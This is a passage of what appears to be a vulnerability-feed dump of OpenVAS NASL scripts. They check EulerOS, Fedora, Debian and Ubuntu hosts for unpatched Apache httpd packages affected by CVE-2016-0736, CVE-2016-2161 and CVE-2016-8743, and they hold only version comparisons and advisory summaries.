script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1086\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1086\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1086 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\nIt was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\nIt was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:37:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171085", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1085)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1085\");\n script_version(\"2020-01-23T10:48:35+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:48:35 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:48:35 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1085)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1085\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1085\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1085 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\nIt was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\nIt was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-26T00:00:00", "id": "OPENVAS:1361412562310872185", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872185", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2016-8d9b62c784", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2016-8d9b62c784\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872185\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-26 06:03:52 +0100 (Mon, 26 Dec 2016)\");\n script_cve_id(\"CVE-2016-8743\", \"CVE-2016-2161\", \"CVE-2016-0736\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for httpd FEDORA-2016-8d9b62c784\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-8d9b62c784\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RHXWKK5E37QOYRHXJ3WS2Z23JZHGY3KW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.25~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-26T00:00:00", "id": "OPENVAS:1361412562310872183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872183", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2016-d22f50d985", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2016-d22f50d985\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872183\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-26 06:03:39 +0100 (Mon, 26 Dec 2016)\");\n script_cve_id(\"CVE-2016-8743\", \"CVE-2016-2161\", \"CVE-2016-0736\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for httpd FEDORA-2016-d22f50d985\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-d22f50d985\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VVGKB5F3K6FJ4OYOPBVOIZKD222R5HOA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.25~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736\nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an attacker\nto guess the session cookie.\n\nCVE-2016-2161\nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743\nDavid Dennerline, of IBM Security", "modified": "2019-03-18T00:00:00", "published": "2017-02-26T00:00:00", "id": "OPENVAS:1361412562310703796", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703796", "type": "openvas", "title": "Debian Security Advisory DSA 3796-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3796.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3796-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703796\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_name(\"Debian Security Advisory DSA 3796-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-26 00:00:00 +0100 (Sun, 26 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3796.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 2.4.10-10+deb8u8.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 2.4.25-1.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736\nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an attacker\nto guess the session cookie.\n\nCVE-2016-2161\nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743\nDavid Dennerline, of IBM Security's X-Force Researchers, and R\u00e9gis\nLeroy discovered problems in the way Apache handled a broad pattern\nof unusual whitespace patterns in HTTP requests. In some\nconfigurations, this could lead to response splitting or cache\npollution vulnerabilities. To fix these issues, this update makes\nApache httpd be more strict in what HTTP requests it accepts.\n\nIf this causes problems with non-conforming clients, some checks can\nbe relaxed by adding the new directive HttpProtocolOptions unsafe\n\nto the configuration.\n\nThis update also fixes the issue where mod_reqtimeout was not enabled\nby default on new installations.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-macro\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-proxy-html\", ver:\"2.4.10-10+deb8u8\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310843156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843156", "type": "openvas", "title": "Ubuntu Update for apache2 USN-3279-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for apache2 USN-3279-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843156\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 06:53:55 +0200 (Wed, 10 May 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apache2 USN-3279-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Apache\nmod_session_crypto module was encrypting data and cookies using either CBC or\nECB modes. A remote attacker could possibly use this issue to perform padding\noracle attacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly use\nthis issue to cause Apache to crash, resulting in a denial of service.\n(CVE-2016-2161)\n\nDavid Dennerline and R&#233 gis Leroy discovered that the Apache HTTP Server\nincorrectly handled unusual whitespace when parsing requests, contrary to\nspecifications. When being used in combination with a proxy or backend\nserver, a remote attacker could possibly use this issue to perform an\ninjection attack and pollute cache. This update may introduce compatibility\nissues with clients that do not strictly follow HTTP protocol\nspecifications. A new configuration option 'HttpProtocolOptions Unsafe' can\nbe used to revert to the previous unsafe behaviour in problematic\nenvironments. (CVE-2016-8743)\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3279-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3279-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.7-1ubuntu4.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu4.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-04-13T00:00:00", "id": "OPENVAS:1361412562310871799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871799", "type": "openvas", "title": "RedHat Update for httpd RHSA-2017:0906-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2017:0906-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms 